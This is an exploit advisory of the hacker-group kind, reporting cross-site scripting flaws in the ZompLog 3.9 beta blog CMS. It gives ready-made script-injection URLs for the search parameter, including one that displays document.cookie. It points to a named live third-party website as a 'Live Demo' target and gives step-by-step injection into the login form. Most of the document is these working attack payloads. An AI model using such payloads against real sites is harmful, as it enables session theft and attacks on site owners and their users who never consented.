############################################################################# 
# Greetings to --d3hydr8 -r45c4l -baltazar -sinner_01 -C1c4Tr1Z - Gabitzu   #
#                         and all darkc0de members                          # 
;############################################################################ 
# 
# Author: swappie [aka] faithlove 
 
# Email : swappieakafaithlove@gmail.com
# 
# Do researching and share! 
# 
;############################################################### 
# 
# Title:  ZompLog 3.9 beta
#
# CMS Link: http://www.zomp.nl/user-content/downloads/zomplog/zomplog3.9-beta.zip
#
# Vendor: http://www.zomp.nl/
# 
#
;############################################################################
#									    #
# Dork: I'm sure you can figure this out alone, right?			    #
#									    #			
#############################################################################


http://www.site.com/index.php?search=>"><script>alert(1234567890)</script>

http://www.site.com/index.php?search=%00'"><script>alert(1234567890)</script>

http://www.site.com/index.php?search=>"><script>alert(document.cookie)</script>


Live Demo:

http://www.irishesseling.nl/index.php?search=>"><script>alert(1234567890)</script>


-----------------------------------------------------------------;


*) Another Vulnerability regards the www.site.com/login.php

Method 1.
===========


We can edit the html source code generated by the login.php and
edit the following line:

<td colspan="2"><input type="text" name="login" value="" maxlength="15" id="log" /></td>



[===] MAKE IT LOOK LIKE THIS:

<td colspan="2"><input type="text" name="login" value=">"><script>alert("XSS Vuln")</script>" maxlength="15" id="log" /></td>




Method 2.
===========

Step 1.

Write in Login section: >">

Step 2.

(Hit Enter) or click the Login Button.

you'll see in Login something looking like this: >\

Step 3.

Delete the ">\" part and insert the following code in it: <script>alert("XSS Vuln")</script>

Step 4.

(Hit Enter) or click the Login Button.

Result: You should see a small window with the "XSS Vuln" text in it.

[!!!] This "login.php part" worked just with a fresh install of the CMS as i have
      installed it locally.


Cheers,
swappie [aka] faithlove